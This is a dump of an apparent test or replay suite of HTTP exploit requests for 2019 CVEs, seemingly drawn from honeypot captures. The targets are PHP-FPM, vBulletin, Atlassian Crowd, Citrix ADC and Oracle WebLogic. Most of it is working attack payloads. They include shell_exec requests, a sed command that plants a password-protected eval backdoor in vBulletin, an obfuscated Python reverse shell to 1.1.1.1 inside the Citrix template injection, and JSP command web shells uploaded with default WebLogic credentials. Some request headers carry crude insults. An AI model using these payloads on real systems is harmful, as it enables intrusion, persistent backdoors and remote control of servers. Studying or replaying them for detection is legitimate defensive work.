QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ",
5 | "Headers": {
6 | "D-Pisos": "8=D",
7 | "Ebut": "mamku tvoyu",
8 | "User-Agent": "Mozilla/5.0",
9 | "Connection": "close"
10 | },
11 | "Reference": "https://github.com/neex/phuip-fpizdam/"
12 | },
13 | {
14 | "Method": "GET",
15 | "URI": "/index.php/path%0ainfo.php?QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ",
16 | "Headers": {
17 | "D-Pisos": "8=D",
18 | "Ebut": "mamku tvoyu",
19 | "User-Agent": "Mozilla/5.0",
20 | "Connection": "close"
21 | },
22 | "Reference": "https://github.com/neex/phuip-fpizdam/"
23 | },
24 | {
25 | "Method": "GET",
26 | "URI": "/index.php/PHP%0Ais_the_crappiest_lang.php?QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ",
27 | "Headers": {
28 | "D-Pisos": "8=D",
29 | "Ebut": "mamku tvoyu",
30 | "User-Agent": "Mozilla/5.0",
31 | "Connection": "close"
32 | },
33 | "Reference": "https://github.com/neex/phuip-fpizdam/"
34 | },
35 | {
36 | "Method": "GET",
37 | "URI": "/index.php/PHP_VALUE%0Alog_errors=1;;;;;;;;;?a=id",
38 | "Headers": {
39 | "D-Pisos": "8=D",
40 | "Ebut": "mamku tvoyu",
41 | "User-Agent": "Mozilla/5.0",
42 | "Connection": "close"
43 | },
44 | "Reference": "https://github.com/neex/phuip-fpizdam/"
45 | }
46 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-11580/description.txt:
--------------------------------------------------------------------------------
1 | Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin
2 | incorrectly enabled in release builds. Attackers who can send unauthenticated
3 | or authenticated requests to a Crowd or Crowd Data Center instance can exploit
4 | this vulnerability to install arbitrary plugins, which permits remote code
5 | execution on systems running a vulnerable version of Crowd or Crowd Data
6 | Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed
7 | version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for
8 | 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from
9 | version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version
10 | 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this
11 | vulnerability.
--------------------------------------------------------------------------------
/tests/CVE-2019-11580/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11580
--------------------------------------------------------------------------------
/tests/CVE-2019-11580/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/crowd/admin/uploadplugin.action",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "multipart/mixed",
8 | "Connection": "close"
9 | },
10 | "Data": {
11 | "file_cdl": "@rce.jar"
12 | },
13 | "Reference": "https://www.corben.io/atlassian-crowd-rce/"
14 | }
15 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-16759/description.txt:
--------------------------------------------------------------------------------
1 | vBulletin 5.x through 5.5.4 allows remote command execution via the
2 | widgetConfig[code] parameter in an ajax/render/widget_php routestring request.
--------------------------------------------------------------------------------
/tests/CVE-2019-16759/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759
--------------------------------------------------------------------------------
/tests/CVE-2019-16759/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/index.php",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Data": {
10 | "routestring": "ajax/render/widget_php",
11 | "widgetConfig[code]": "echo shell_exec('\"+cmd+\"'); exit;"
12 | },
13 | "Reference": "https://seclists.org/fulldisclosure/2019/Sep/31"
14 | },
15 | {
16 | "Method": "POST",
17 | "URI": "/index.php?routestring=ajax/render/widget_php",
18 | "Headers": {
19 | "User-Agent": "Mozilla/5.0",
20 | "Connection": "close"
21 | },
22 | "Data": {
23 | "widgetConfig[code]": "echo shell_exec('\"+cmd+\"'); exit;"
24 | },
25 | "Reference": "https://seclists.org/fulldisclosure/2019/Sep/31"
26 | },
27 | {
28 | "Method": "POST",
29 | "URI": "/index.php",
30 | "Headers": {
31 | "User-Agent": "Mozilla/5.0",
32 | "Connection": "close",
33 | "Content-Length": "378",
34 | "Content-Type": "application/x-www-form-urlencoded",
35 | "Accept-Encoding": "gzip"
36 | },
37 | "Data": {
38 | "routestring": "ajax/render/widget_php",
39 | "widgetConfig%5Bcode%5D": "echo+shell_exec%28%27sed+-i+%5C%27s%2Feval%28%5C%24code%29%3B%2Fif+%28isset%28%5C%24_REQUEST%5B%5C%22epass%5C%22%5D%29+%5C%26%5C%26+%5C%24_REQUEST%5B%5C%22epass%5C%22%5D+%3D%3D+%5C%222dmfrb28nu3c6s9j%5C%22%29+%7B+eval%28%5C%24code%29%3B+%7D%2Fg%5C%27+includes%2Fvb5%2Ffrontend%2Fcontroller%2Fbbcode.php+%26%26+echo+-n+exploited+%7C+md5sum%27%29%3B+exit%3B"
40 | },
41 | "Reference": "honeydb.io"
42 | },
43 | {
44 | "Method": "POST",
45 | "URI": "/index.php?routestring=ajax/render/widget_php",
46 | "Headers": {
47 | "User-Agent": "Mozilla/5.0",
48 | "Connection": "close",
49 | "Content-Length": "378",
50 | "Content-Type": "application/x-www-form-urlencoded",
51 | "Accept-Encoding": "gzip"
52 | },
53 | "Data": {
54 | "widgetConfig%5Bcode%5D": "echo+shell_exec%28%27sed+-i+%5C%27s%2Feval%28%5C%24code%29%3B%2Fif+%28isset%28%5C%24_REQUEST%5B%5C%22epass%5C%22%5D%29+%5C%26%5C%26+%5C%24_REQUEST%5B%5C%22epass%5C%22%5D+%3D%3D+%5C%222dmfrb28nu3c6s9j%5C%22%29+%7B+eval%28%5C%24code%29%3B+%7D%2Fg%5C%27+includes%2Fvb5%2Ffrontend%2Fcontroller%2Fbbcode.php+%26%26+echo+-n+exploited+%7C+md5sum%27%29%3B+exit%3B"
55 | },
56 | "Reference": "honeydb.io"
57 | },
58 | {
59 | "Method": "POST",
60 | "URI": "/index.php?routestring=ajax/render/widget_php",
61 | "Headers": {
62 | "User-Agent": "Mozilla/5.0",
63 | "Connection": "close",
64 | "Content-Length": "378",
65 | "Content-Type": "application/x-www-form-urlencoded",
66 | "Accept-Encoding": "gzip"
67 | },
68 | "Data": {
69 | "widgetConfig[code]": "echo shell_exec('sed -i \\'s/eval(\\$code);/if (isset(\\$_REQUEST[\"epass\"]) \\&\\& \\$_REQUEST[\"epass\"] == \"2dmfrb28nu3c6s9j\") { eval(\\$code); }/g\\' includes/vb5/frontend/controller/bbcode.php && echo -n exploited | md5sum'); exit;"
70 | },
71 | "Reference": "honeydb.io"
72 | },
73 | {
74 | "Method": "POST",
75 | "URI": "/forum.php?routestring=ajax/render/widget_php",
76 | "Headers": {
77 | "User-Agent": "Mozilla/5.0",
78 | "Connection": "close",
79 | "Content-Length": "69",
80 | "Content-Type": "application/x-www-form-urlencoded",
81 | "Accept-Encoding": "gzip"
82 | },
83 | "Data": {
84 | "epass": "2dmfrb28nu3c6s9j",
85 | "widgetConfig[code]": "=die(@md5(HellovBulletin));"
86 | },
87 | "Reference": "honeydb.io"
88 | },
89 | {
90 | "Method": "POST",
91 | "URI": "/forum.php?routestring=ajax/render/widget_php&widgetConfig[code]=phpinfo();",
92 | "Headers": {
93 | "User-Agent": "Mozilla/5.0",
94 | "Connection": "close",
95 | "Content-Type": "application/x-www-form-urlencoded",
96 | "Accept-Encoding": "gzip"
97 | },
98 | "Reference": "https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759/"
99 | },
100 | {
101 | "Method": "GET",
102 | "URI": "/forum.php?routestring=ajax/render/widget_php&widgetConfig[code]=phpinfo();",
103 | "Headers": {
104 | "User-Agent": "Mozilla/5.0",
105 | "Connection": "close"
106 | },
107 | "Reference": "https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759/"
108 | }
109 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-19781/description.txt:
--------------------------------------------------------------------------------
1 | An issue was discovered in Citrix Application Delivery Controller (ADC) and
2 | Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
--------------------------------------------------------------------------------
/tests/CVE-2019-19781/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781
--------------------------------------------------------------------------------
/tests/CVE-2019-19781/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/vpn/../vpns/portal/scripts/newbm.pl",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Accept-Encoding": "gzip, deflate",
8 | "Accept": "*/*",
9 | "NSC_NONCE": "12",
10 | "NSC_USER": "../../../netscaler/portal/templates/hzgsquvrnq",
11 | "Content-Length": "3549",
12 | "Content-Type": "application/x-www-form-urlencoded",
13 | "Connection": "close"
14 | },
15 | "Data-File": "test1.txt",
16 | "Reference": "https://github.com/trustedsec/cve-2019-19781/"
17 | },
18 | {
19 | "Method": "GET",
20 | "URI": "/vpn/../vpns/portal/hzgsquvrnq.xml",
21 | "Headers": {
22 | "User-Agent": "Mozilla/5.0",
23 | "Accept-Encoding": "gzip, deflate",
24 | "Accept": "*/*",
25 | "NSC_NONCE": "12",
26 | "NSC_USER": "hzgsquvrnq"
27 | },
28 | "Reference": "https://github.com/trustedsec/cve-2019-19781/"
29 | },
30 | {
31 | "Method": "GET",
32 | "URI": "/vpn/../vpns/cfg/smb.conf",
33 | "Headers": {
34 | "User-Agent": "Mozilla/5.0",
35 | "Accept-Encoding": "gzip"
36 | },
37 | "Reference": "https://honeydb.io"
38 | }
39 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-19781/test1.txt:
--------------------------------------------------------------------------------
1 | url=127.0.0.1&desc=desc&UI_inuse=a&title=%5B%25+template.new%28%7B%27BLOCK%27%3D%27print+readpipe%28chr%2847%29+.+chr%28118%29+.+chr%2897%29+.+chr%28114%29+.+chr%2847%29+.+chr%28112%29+.+chr%28121%29+.+chr%28116%29+.+chr%28104%29+.+chr%28111%29+.+chr%28110%29+.+chr%2847%29+.+chr%2898%29+.+chr%28105%29+.+chr%28110%29+.+chr%2847%29+.+chr%28112%29+.+chr%28121%29+.+chr%28116%29+.+chr%28104%29+.+chr%28111%29+.+chr%28110%29+.+chr%2832%29+.+chr%2845%29+.+chr%2899%29+.+chr%2832%29+.+chr%2839%29+.+chr%28105%29+.+chr%28109%29+.+chr%28112%29+.+chr%28111%29+.+chr%28114%29+.+chr%28116%29+.+chr%2832%29+.+chr%28115%29+.+chr%28111%29+.+chr%2899%29+.+chr%28107%29+.+chr%28101%29+.+chr%28116%29+.+chr%2844%29+.+chr%28115%29+.+chr%28117%29+.+chr%2898%29+.+chr%28112%29+.+chr%28114%29+.+chr%28111%29+.+chr%2899%29+.+chr%28101%29+.+chr%28115%29+.+chr%28115%29+.+chr%2844%29+.+chr%28111%29+.+chr%28115%29+.+chr%2859%29+.+chr%28115%29+.+chr%2861%29+.+chr%28115%29+.+chr%28111%29+.+chr%2899%29+.+chr%28107%29+.+chr%28101%29+.+chr%28116%29+.+chr%2846%29+.+chr%28115%29+.+chr%28111%29+.+chr%2899%29+.+chr%28107%29+.+chr%28101%29+.+chr%28116%29+.+chr%2840%29+.+chr%28115%29+.+chr%28111%29+.+chr%2899%29+.+chr%28107%29+.+chr%28101%29+.+chr%28116%29+.+chr%2846%29+.+chr%2865%29+.+chr%2870%29+.+chr%2895%29+.+chr%2873%29+.+chr%2878%29+.+chr%2869%29+.+chr%2884%29+.+chr%2844%29+.+chr%28115%29+.+chr%28111%29+.+chr%2899%29+.+chr%28107%29+.+chr%28101%29+.+chr%28116%29+.+chr%2846%29+.+chr%2883%29+.+chr%2879%29+.+chr%2867%29+.+chr%2875%29+.+chr%2895%29+.+chr%2883%29+.+chr%2884%29+.+chr%2882%29+.+chr%2869%29+.+chr%2865%29+.+chr%2877%29+.+chr%2841%29+.+chr%2859%29+.+chr%28115%29+.+chr%2846%29+.+chr%2899%29+.+chr%28111%29+.+chr%28110%29+.+chr%28110%29+.+chr%28101%29+.+chr%2899%29+.+chr%28116%29+.+chr%2840%29+.+chr%2840%29+.+chr%2834%29+.+chr%2849%29+.+chr%2846%29+.+chr%2849%29+.+chr%2846%29+.+chr%2849%29+.+chr%2846%29+.+chr%2849%29+.+chr%2834%29+.+chr%2844%29+.+chr%2857%29+.+chr%2848%29+.+chr%2841%29+.+chr%2841%29+.+chr%2859%29+.+chr%28111%29+.+chr%28115%29+.+chr%2846%29+.+chr%28100%29+.+chr%28117%29+.+chr%28112%29+.+chr%2850%29+.+chr%2840%29+.+chr%28115%29+.+chr%2846%29+.+chr%28102%29+.+chr%28105%29+.+chr%28108%29+.+chr%28101%29+.+chr%28110%29+.+chr%28111%29+.+chr%2840%29+.+chr%2841%29+.+chr%2844%29+.+chr%2848%29+.+chr%2841%29+.+chr%2859%29+.+chr%2832%29+.+chr%28111%29+.+chr%28115%29+.+chr%2846%29+.+chr%28100%29+.+chr%28117%29+.+chr%28112%29+.+chr%2850%29+.+chr%2840%29+.+chr%28115%29+.+chr%2846%29+.+chr%28102%29+.+chr%28105%29+.+chr%28108%29+.+chr%28101%29+.+chr%28110%29+.+chr%28111%29+.+chr%2840%29+.+chr%2841%29+.+chr%2844%29+.+chr%2849%29+.+chr%2841%29+.+chr%2859%29+.+chr%2832%29+.+chr%28111%29+.+chr%28115%29+.+chr%2846%29+.+chr%28100%29+.+chr%28117%29+.+chr%28112%29+.+chr%2850%29+.+chr%2840%29+.+chr%28115%29+.+chr%2846%29+.+chr%28102%29+.+chr%28105%29+.+chr%28108%29+.+chr%28101%29+.+chr%28110%29+.+chr%28111%29+.+chr%2840%29+.+chr%2841%29+.+chr%2844%29+.+chr%2850%29+.+chr%2841%29+.+chr%2859%29+.+chr%28112%29+.+chr%2861%29+.+chr%28115%29+.+chr%28117%29+.+chr%2898%29+.+chr%28112%29+.+chr%28114%29+.+chr%28111%29+.+chr%2899%29+.+chr%28101%29+.+chr%28115%29+.+chr%28115%29+.+chr%2846%29+.+chr%2899%29+.+chr%2897%29+.+chr%28108%29+.+chr%28108%29+.+chr%2840%29+.+chr%2891%29+.+chr%2834%29+.+chr%2847%29+.+chr%2898%29+.+chr%28105%29+.+chr%28110%29+.+chr%2847%29+.+chr%28115%29+.+chr%28104%29+.+chr%2834%29+.+chr%2844%29+.+chr%2834%29+.+chr%2845%29+.+chr%28105%29+.+chr%2834%29+.+chr%2893%29+.+chr%2841%29+.+chr%2859%29+.+chr%2839%29%29%27%7D%29%25%5D
--------------------------------------------------------------------------------
/tests/CVE-2019-2618/description.txt:
--------------------------------------------------------------------------------
1 | TBD - weblogic unrestricted file upload
--------------------------------------------------------------------------------
/tests/CVE-2019-2618/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2618
--------------------------------------------------------------------------------
/tests/CVE-2019-2618/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/bea_wls_deployment_internal/DeploymentService",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Accept": "text/html, image/gif, image/jpeg, */*; q=.2",
8 | "Connection": "keep-alive",
9 | "username": "weblogic",
10 | "password": "weblogic",
11 | "wl_request_type": "app_upload",
12 | "wl_upload_application_name": "\\..\\tmp\\_WL_internal\\bea_wls_internal\\9j4dqk\\war",
13 | "wl_upload_delta": "true",
14 | "archive": "true",
15 | "serverName": "pyn3rd",
16 | "server_version": "10.3.6.0",
17 | "Content-Type": "multipart/form-data; boundary=---------------------------55365303813990412251182616919",
18 | "Content-Length": "982"
19 | },
20 | "Data-File": "test1.txt",
21 | "Reference": "https://github.com/pyn3rd/CVE-2019-2618"
22 | },
23 | {
24 | "Method": "POST",
25 | "URI": "/bea_wls_deployment_internal/DeploymentService",
26 | "Headers": {
27 | "User-Agent": "Mozilla/5.0",
28 | "Accept": "*/*",
29 | "Connection": "close",
30 | "username": "weblogic",
31 | "password": "Oracle@123",
32 | "wl_request_type": "app_upload",
33 | "wl_upload_application_name": "\\..\\tmp\\_WL_internal\\bea_wls_internal\\9j4dqk\\war",
34 | "wl_upload_delta": "true",
35 | "archive": "true",
36 | "serverName": "Jas502n",
37 | "server_version": "10.3.6.0",
38 | "cache-control": "no-cache",
39 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
40 | "Content-Length": "1081"
41 | },
42 | "Data-File": "test2.txt",
43 | "Reference": "https://github.com/jas502n/cve-2019-2618"
44 | }
45 | ]
46 |
--------------------------------------------------------------------------------
/tests/CVE-2019-2618/test1.txt:
--------------------------------------------------------------------------------
1 | -----------------------------55365303813990412251182616919
2 | Content-Disposition: form-data; name="img"; filename="cmd.jsp"
3 | Content-Type: application/octet-stream
4 |
5 | <%@ page import="java.util.*,java.io.*"%>
6 | <%
7 | %>
8 |
9 |
10 |
14 |
15 | <%
16 | if (request.getParameter("cmd") != null) {
17 | out.println("Command: " + request.getParameter("cmd") + "
");
18 | Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
19 | OutputStream os = p.getOutputStream();
20 | InputStream in = p.getInputStream();
21 | DataInputStream dis = new DataInputStream(in);
22 | String disr = dis.readLine();
23 | while ( disr != null ) {
24 | out.println(disr);
25 | disr = dis.readLine();
26 | }
27 | }
28 | %>
29 |
30 |
31 |
32 | -----------------------------55365303813990412251182616919--
--------------------------------------------------------------------------------
/tests/CVE-2019-2618/test2.txt:
--------------------------------------------------------------------------------
1 | ------WebKitFormBoundary7MA4YWxkTrZu0gW
2 | Content-Disposition: form-data; name="shell.jsp"; filename="shell.jsp"
3 | Content-Type: false
4 |
5 | <%@ page import="java.util.*,java.io.*"%>
6 | <%
7 | %>
8 |
9 | Commands with JSP
10 |
14 |
15 | <%
16 | if (request.getParameter("cmd") != null) {
17 | out.println("Command: " + request.getParameter("cmd") + "
");
18 | Process p;
19 | if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
20 | p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
21 | }
22 | else{
23 | p = Runtime.getRuntime().exec(request.getParameter("cmd"));
24 | }
25 | OutputStream os = p.getOutputStream();
26 | InputStream in = p.getInputStream();
27 | DataInputStream dis = new DataInputStream(in);
28 | String disr = dis.readLine();
29 | while ( disr != null ) {
30 | out.println(disr);
31 | disr = dis.readLine();
32 | }
33 | }
34 | %>
35 |
36 |
37 |
38 | ------WebKitFormBoundary7MA4YWxkTrZu0gW--
--------------------------------------------------------------------------------
/tests/CVE-2019-2725/description.txt:
--------------------------------------------------------------------------------
1 | Vulnerability in the Oracle WebLogic Server component of Oracle Fusion
2 | Middleware (subcomponent: Web Services). Supported versions that are affected
3 | are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows
4 | unauthenticated attacker with network access via HTTP to compromise Oracle
5 | WebLogic Server. Successful attacks of this vulnerability can result in
6 | takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality,
7 | Integrity and Availability impacts). CVSS Vector:
8 | (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
--------------------------------------------------------------------------------
/tests/CVE-2019-2725/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2725
--------------------------------------------------------------------------------
/tests/CVE-2019-2725/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/_async/AsyncResponseService",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Length": "2159",
8 | "Content-Type": "text/xml",
9 | "Accept-Encoding": "gzip, deflate, compress",
10 | "Accept": "*/*"
11 | },
12 | "Data-File": "test1.txt",
13 | "Reference": "https://github.com/jas502n/CNVD-C-2019-48814"
14 | },
15 | {
16 | "Method": "POST",
17 | "URI": "/_async/AsyncResponseService",
18 | "Headers": {
19 | "User-Agent": "Mozilla/5.0",
20 | "Content-Length": "955",
21 | "Content-Type": "text/xml",
22 | "Accept-Encoding": "gzip, deflate, compress",
23 | "Accept": "*/*"
24 | },
25 | "Data-File": "test2.txt",
26 | "Reference": "https://github.com/jas502n/CNVD-C-2019-48814"
27 | },
28 | {
29 | "Method": "POST",
30 | "URI": "/_async/AsyncResponseService",
31 | "Headers": {
32 | "User-Agent": "Mozilla/5.0",
33 | "Content-Length": "955",
34 | "Content-Type": "text/xml",
35 | "Accept-Encoding": "gzip, deflate, compress",
36 | "Accept": "*/*"
37 | },
38 | "Data-File": "test3.txt",
39 | "Reference": "https://github.com/jas502n/CNVD-C-2019-48814"
40 | },
41 | {
42 | "Method": "POST",
43 | "URI": "/_async/AsyncResponseServiceHttps",
44 | "Headers": {
45 | "User-Agent": "Mozilla/5.0",
46 | "Content-Length": "955",
47 | "Content-Type": "text/xml",
48 | "Accept-Encoding": "gzip, deflate",
49 | "Accept": "*/*",
50 | "Accept-Language": "en"
51 | },
52 | "Data-File": "test4.txt",
53 | "Reference": "https://www.exploit-db.com/exploits/46780"
54 | },
55 | {
56 | "Method": "POST",
57 | "URI": "/_async/AsyncResponseService",
58 | "Headers": {
59 | "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13",
60 | "Content-Length": "1090",
61 | "Content-Type": "text/xml",
62 | "Connection": "keep-alive",
63 | "Accept-Encoding": "gzip, deflate",
64 | "Accept": "*/*",
65 | "Accept-Language": "en"
66 | },
67 | "Data-File": "test5.txt",
68 | "Reference": "https://riskdiscovery.com/honeydb"
69 | }
70 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-2725/test1.txt:
--------------------------------------------------------------------------------
1 | xxxx
2 |
3 |
4 |
5 | /bin/bash
6 |
7 |
8 | -c
9 |
10 |
